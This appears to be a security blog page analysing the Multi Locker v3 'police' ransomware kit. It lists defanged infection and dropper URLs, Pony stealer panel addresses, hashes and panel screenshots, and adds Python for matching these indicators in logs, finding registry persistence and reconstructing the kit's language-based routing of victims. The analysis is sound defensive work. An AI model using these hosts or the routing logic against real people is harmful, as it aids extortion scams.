<div class="MsoNormal">
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-ze_6F8dK9io/UPMPasZeHVI/AAAAAAAAAaA/e1RbJTrN3Vw/s1600/pony-server-B.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-ze_6F8dK9io/UPMPasZeHVI/AAAAAAAAAaA/e1RbJTrN3Vw/s1600/pony-server-B.jpg" /></a></div>
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"></span></span><br /></div>
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;">Finalmente se
presenta parte de la estructura de ficheros del KIT PONY:</span></span></div>
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></span></div>
<div class="MsoNormal">
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-6Vfk0j_rDGE/UPMRJ5ekh3I/AAAAAAAAAa0/Upb9ngu1KFg/s1600/files-kit.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="293" src="http://3.bp.blogspot.com/-6Vfk0j_rDGE/UPMRJ5ekh3I/AAAAAAAAAa0/Upb9ngu1KFg/s400/files-kit.jpg" width="400" /></a></div>
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"></span></span><br /></div>
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></span></div>
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;">Se han
localizado otras direcciones maliciosas conteniendo paneles Pony activos en:</span></span></div>
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;">hXXp://217.195.200.12:8080/ponyb/admin.php</span></span></div>
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"><span lang="EN-US">hXXp://195.5.208.204:8080/ponyb/admin.php</span></span></span></div>
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;"><span lang="EN-US">hXXp://9jal33ts.com/ponysample/admin.php</span></span></span></div>
<div class="MsoNormal">
<span style="font-size: small;"><span style="font-family: Arial,Helvetica,sans-serif;">hxxp://198.27.83.179/popo/</span></span></div>
Jose Dos Santoshttp://www.blogger.com/profile/06085925687781351552noreply@blogger.com0tag:blogger.com,1999:blog-5707299821054210891.post-3622541626811802722013-01-07T08:59:00.001-08:002013-01-07T09:00:59.084-08:00Trojan Multi Locker Version 3 - "Trojan police" <br />
<!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267">
<w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" Priority="39" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" Name="toc 9"/>
<w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" Priority="0" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
</w:LatentStyles>
</xml><![endif]--><!--[if gte mso 10]>
<![endif]-->
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">Recently there has been a marked increase in infections by the ransomware trojan also known as Ransomlock or Multi-Locker and, more popularly, as the "police trojan", because it pretends that the user's computer has been seized and locked by the police until a fine is paid. The "fine" is nothing more than a scam run by criminals.</span>
<br />
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">This post analyses the MULTI LOCKER Version 3 trojan kit.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN;">The user's computer is compromised by visiting the infection vector:</span> </div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: "Arial","sans-serif"; mso-ansi-language: ES;">hxxp://62.76.45.94/exe.php</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">It downloads the malicious binary:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif";">hxxp://62.76.45.94/colt.exe</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif";">Size: 7680 bytes</span></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif";">MD5: baa5de00714b02660bfc092b53c449f7</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">The IP address 62.76.45.94 is hosted by the ISP Clodo-Cloud in Russia.</span></div>
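<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">The indicators above (the infection vector, the dropped binary, the hosting IP address, and the size and MD5 of colt.exe) are enough to sweep proxy logs and quarantined files for this campaign. The Python below is an added example, not code from this post or from the kit: it matches the post's indicators against a few Squid-format access log lines constructed for the example, and checks a downloaded file against the published size and hash. The log format, the client addresses and the request for /lending/ are assumptions made for the example.</span></div>

```python
import hashlib
import re
from urllib.parse import urlsplit

# Indicators listed in this post; the hXXp:// defanging is undone so the URLs
# compare against what a proxy log actually records.
IOC_IP = "62.76.45.94"
IOC_URLS = {
    "http://62.76.45.94/exe.php",          # infection vector
    "http://62.76.45.94/colt.exe",         # dropped binary
    "http://62.76.45.94/lending/tds.php",  # language-routing script
    "http://62.76.45.94/lending/ES.php",   # Spanish lock screen
}
IOC_MD5 = "baa5de00714b02660bfc092b53c449f7"
IOC_SIZE = 7680

# Squid-format access log lines constructed for this example (not captured traffic).
# Fields: timestamp, elapsed ms, client, cache code/status, bytes, method, URL, hierarchy, type.
SAMPLE_LOG = """\
1357567201.123    412 10.0.0.15 TCP_MISS/200 8123 GET http://62.76.45.94/exe.php - DIRECT/62.76.45.94 text/html
1357567202.456    980 10.0.0.15 TCP_MISS/200 7914 GET http://62.76.45.94/colt.exe - DIRECT/62.76.45.94 application/octet-stream
1357567230.001    120 10.0.0.22 TCP_HIT/200 5120 GET http://www.example.com/index.html - NONE/- text/html
1357567260.777    301 10.0.0.15 TCP_MISS/200 6000 GET http://62.76.45.94/lending/tds.php?id=1 - DIRECT/62.76.45.94 text/html
1357567300.900    200 10.0.0.31 TCP_MISS/200 2100 GET http://62.76.45.94/lending/ - DIRECT/62.76.45.94 text/html
"""

LOG_RE = re.compile(
    r"^(?P<ts>\d+\.\d+)\s+\d+\s+(?P<client>\S+)\s+\S+\s+\d+\s+(?P<method>\S+)\s+(?P<url>\S+)"
)


def match_log(log_text):
    """Return (client, url, reason) for every request touching the kit's host or URLs."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = m.group("url")
        parts = urlsplit(url)
        # Compare scheme+host+path so a query string (e.g. ?id=1) does not hide a known URL.
        canonical = f"{parts.scheme}://{parts.netloc}{parts.path}"
        if canonical in IOC_URLS:
            hits.append((m.group("client"), url, "known kit URL"))
        elif parts.hostname == IOC_IP:
            hits.append((m.group("client"), url, "kit host"))
    return hits


def infected_clients(log_text):
    """Clients that fetched the infection vector or the binary, i.e. the ones to isolate."""
    return sorted({c for c, url, _ in match_log(log_text)
                   if url.startswith(("http://62.76.45.94/exe.php", "http://62.76.45.94/colt.exe"))})


def check_sample(data):
    """Cheap size check first, then MD5, against the colt.exe indicators above."""
    if len(data) != IOC_SIZE:
        return False
    return hashlib.md5(data).hexdigest() == IOC_MD5


if __name__ == "__main__":
    for client, url, reason in match_log(SAMPLE_LOG):
        print(f"{client}  {reason:14s}  {url}")
    print("isolate:", infected_clients(SAMPLE_LOG))
```

<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">Matching on scheme, host and path rather than the whole URL matters because the TDS is called with query parameters; a client that only touched the panel directory is reported as "kit host" and is worth a look, but only the clients that fetched exe.php or colt.exe are listed for isolation.</span></div>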
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">Once the computer is infected, the ransomware modifies the system configuration and registry so that every time the user restarts the computer the trojan starts automatically, takes control and locks the whole system. It then displays a fake police screen demanding that the user pay a fine for allegedly viewing child pornography or content that infringes intellectual property.</span></div>
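<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">The post does not say which registry locations the kit changes to regain control at every restart. The Winlogon Shell and Userinit values and the Run keys checked below are the locations such lockers commonly abuse and are an assumption of this added Python example, which is not code from the post or from the kit. It parses a .reg export (the kind produced by reg export; the sample here is constructed) and flags autostart entries that differ from the Windows defaults, reference the dropper name from this post, or run from a temporary directory.</span></div>

```python
import re

# The post says only that the kit changes the registry so it regains control at every
# restart; the locations below are the usual ones such lockers use and are an assumption.
WINLOGON = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
WINLOGON_DEFAULTS = {
    "Shell": "explorer.exe",
    "Userinit": r"C:\Windows\system32\userinit.exe,",
}
RUN_KEYS = (
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
)
KNOWN_DROPPER_NAMES = {"colt.exe"}  # binary named in this post
# Directories a legitimate autostart entry rarely runs from.
SUSPICIOUS_DIRS = re.compile(r"\\(Temp|Application Data|Local Settings)\\", re.I)

# A .reg export constructed for this example; it is not from an infected machine.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="explorer.exe, C:\\Documents and Settings\\user\\Local Settings\\Temp\\colt.exe"
"Userinit"="C:\\Windows\\system32\\userinit.exe,"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"ctfmon"="C:\\Windows\\system32\\ctfmon.exe"
"update"="\"C:\\Documents and Settings\\user\\Local Settings\\Temp\\colt.exe\""
"""

KEY_RE = re.compile(r"^\[(?P<key>[^\]]+)\]$")
VALUE_RE = re.compile(r'^"(?P<name>(?:[^"\\]|\\.)*)"=(?P<val>.*)$')


def _unescape(s):
    # .reg files double backslashes and escape quotes inside string values.
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg(text):
    """Parse a .reg export into {key: {value_name: value}}; only string values are decoded."""
    keys = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        m = KEY_RE.match(line)
        if m:
            current = m.group("key")
            keys.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            val = m.group("val")
            if len(val) >= 2 and val.startswith('"') and val.endswith('"'):
                val = _unescape(val[1:-1])
            keys[current][_unescape(m.group("name"))] = val
    return keys


def find_persistence(text):
    """Return (key, value_name, value, reason) for entries that look like locker persistence."""
    findings = []
    keys = parse_reg(text)
    winlogon = keys.get(WINLOGON, {})
    for name, default in WINLOGON_DEFAULTS.items():
        val = winlogon.get(name)
        if val is not None and val.strip().lower() != default.lower():
            findings.append((WINLOGON, name, val, f"Winlogon {name} differs from default {default!r}"))
    for key in RUN_KEYS:
        for name, val in keys.get(key, {}).items():
            if any(d in val.lower() for d in KNOWN_DROPPER_NAMES):
                findings.append((key, name, val, "references known dropper"))
            elif SUSPICIOUS_DIRS.search(val):
                findings.append((key, name, val, "autostart from a temporary or user-writable directory"))
    return findings


if __name__ == "__main__":
    for key, name, val, reason in find_persistence(SAMPLE_REG):
        print(f"{reason}\n  {key}\\{name} = {val}")
```

<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">A hijacked Winlogon Shell is what makes a locker appear before the desktop, so comparing it against the default is the check to run first on a locked machine booted from rescue media; the Run-key checks catch the cruder variants that simply register the dropper as an autostart entry.</span></div>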
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">This fake police screen is served by the fraudulent server at:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif";">hxxp://62.76.45.94/lending/tds.php</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">This script checks the language of the victim's browser and serves the fake police screen in the victim's own language, complete with legal notices and warnings attributed to that country's police.</span></div>
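<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">The tds.php source is only shown as a screenshot, so the Python below is an added reconstruction of the routing idea rather than the kit's code: it parses the browser's Accept-Language header by q value, maps the primary language subtag to a country page, and falls back to a default. Only ES.php is named in the post; the other page names, the fallback page and the probe helper are assumptions made for the example. The same parser gives an analyst the header values needed to collect every localized page from the server.</span></div>

```python
# Page names keyed by the primary language subtag. Only ES.php is named in the
# post; the other entries and the fallback are assumptions for this example.
LANDING_PAGES = {"es": "ES.php", "de": "DE.php", "fr": "FR.php", "it": "IT.php", "en": "EN.php"}
DEFAULT_PAGE = "EN.php"


def parse_accept_language(header):
    """Parse an Accept-Language header into [(tag, q)] ordered by descending q.

    Ties keep the order in which the browser listed them. A malformed q value
    is treated as q=0, so that entry is never selected.
    """
    langs = []
    for position, part in enumerate(header.split(",")):
        part = part.strip()
        if not part:
            continue
        pieces = [p.strip() for p in part.split(";")]
        tag = pieces[0].lower()
        q = 1.0
        for p in pieces[1:]:
            if p.lower().startswith("q="):
                try:
                    q = float(p[2:])
                except ValueError:
                    q = 0.0
        langs.append((tag, max(0.0, min(q, 1.0)), position))
    langs.sort(key=lambda t: (-t[1], t[2]))
    return [(tag, q) for tag, q, _ in langs]


def pick_landing_page(header):
    """Choose the localized lock screen the way a TDS would: first acceptable language wins."""
    for tag, q in parse_accept_language(header):
        if q <= 0:
            continue  # q=0 means the client explicitly refuses this language
        primary = tag.split("-")[0]  # es-ES and es-MX both route to ES.php
        if primary in LANDING_PAGES:
            return LANDING_PAGES[primary]
    return DEFAULT_PAGE


def probe_headers():
    """Accept-Language values an analyst can send to collect every localized page."""
    return [f"{lang};q=1.0" for lang in sorted(LANDING_PAGES)]


if __name__ == "__main__":
    for hdr in ("es-ES,es;q=0.8,en;q=0.5", "en-US,en;q=0.9", "ja,zh-CN;q=0.8", ""):
        print(f"{hdr!r:32} -> {pick_landing_page(hdr)}")
    print("probe with:", probe_headers())
```

<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">Because the choice depends only on a client-supplied header, the server can be walked through all of its country pages from one machine by replaying the request once per probe header, which is how the full set of lock screens for a kit like this can be collected for signatures.</span></div>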
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">The source of "tds.php" is shown below:</span></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-oR8gTtFTWdA/UOrecrjMjZI/AAAAAAAAAWk/Z_6aPn7i7ng/s1600/tds.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="http://1.bp.blogspot.com/-oR8gTtFTWdA/UOrecrjMjZI/AAAAAAAAAWk/Z_6aPn7i7ng/s640/tds.jpg" width="476" /></a></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;"><br /></span></div>
<br />
<br />
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">Spanish users would be shown the following fraudulent screen, hosted at:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif";">hxxp://62.76.45.94/lending/ES.php</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-FU8qIHKDxUo/UOre0F0JZcI/AAAAAAAAAWs/INFF3Jn-e4g/s1600/police.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="277" src="http://3.bp.blogspot.com/-FU8qIHKDxUo/UOre0F0JZcI/AAAAAAAAAWs/INFF3Jn-e4g/s400/police.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">In this example the screen is very poorly designed, unlike those of other kits we have seen, which are detailed enough to convince the user that the warning is genuine.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">Criminals can edit these fake warning pages to make them look more official using the mini editor built into the ransomware kit, which some antivirus vendors detect as Ransomlock.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">The panel is called MULTI LOCKER LENDING EDITOR ("lending" is the kit's own spelling and also appears in its URLs) and is accessed via the URL:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif";">hxxp://62.76.45.94/lending/</span></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif";"> </span><span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;"> </span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-NXrO9kPRgQI/UOre-l4bB4I/AAAAAAAAAW0/sSHDs6gD0g0/s1600/login.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="145" src="http://1.bp.blogspot.com/-NXrO9kPRgQI/UOre-l4bB4I/AAAAAAAAAW0/sSHDs6gD0g0/s400/login.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">The file structure of the LENDING kit is:</span></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;"> </span>
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-tD3DDKIMkxU/UOrfJiMT13I/AAAAAAAAAW8/xdus2Kaxei0/s1600/mutilocker.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://2.bp.blogspot.com/-tD3DDKIMkxU/UOrfJiMT13I/AAAAAAAAAW8/xdus2Kaxei0/s400/mutilocker.jpg" width="305" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">If the user pays the fine through an online payment system such as Ukash or MoneyPak, the kit unlocks the machine once the voucher code returned by the payment system is entered into the lock screen.</span></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-VdYoO8njfGI/UOrfj7iYl3I/AAAAAAAAAXE/Rv07xw_tozU/s1600/unlock.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="70" src="http://3.bp.blogspot.com/-VdYoO8njfGI/UOrfj7iYl3I/AAAAAAAAAXE/Rv07xw_tozU/s400/unlock.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-KqrJ2L6gWCM/UOrfpMmlCXI/AAAAAAAAAXM/I3ZTAnhJX7I/s1600/unlock-2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="41" src="http://2.bp.blogspot.com/-KqrJ2L6gWCM/UOrfpMmlCXI/AAAAAAAAAXM/I3ZTAnhJX7I/s400/unlock-2.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">The ransomware's statistics panel is accessed through the main login page:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-C9u5zIyA5Do/UOrfwC5QyTI/AAAAAAAAAXU/I6FqhwZyrro/s1600/login2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="208" src="http://2.bp.blogspot.com/-C9u5zIyA5Do/UOrfwC5QyTI/AAAAAAAAAXU/I6FqhwZyrro/s400/login2.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">Once logged in, the main menu of the MULTI LOCKER Version 3 kit is displayed:</span>
<br />
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-AXNh0DA-7g8/UOrf6dg7scI/AAAAAAAAAXc/vrOxnrSQQBI/s1600/2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="262" src="http://4.bp.blogspot.com/-AXNh0DA-7g8/UOrf6dg7scI/AAAAAAAAAXc/vrOxnrSQQBI/s400/2.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<br />
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">Panel with statistics on infected users:</span><br />
<br />
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-cnKoAQUqwWk/UOrgngINuQI/AAAAAAAAAXk/3BvZ-Wq9bJk/s1600/1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="338" src="http://1.bp.blogspot.com/-cnKoAQUqwWk/UOrgngINuQI/AAAAAAAAAXk/3BvZ-Wq9bJk/s400/1.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="font-family: "Arial","sans-serif"; mso-ansi-language: EN-US;">Menu listing the users who have paid to unlock their computers:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
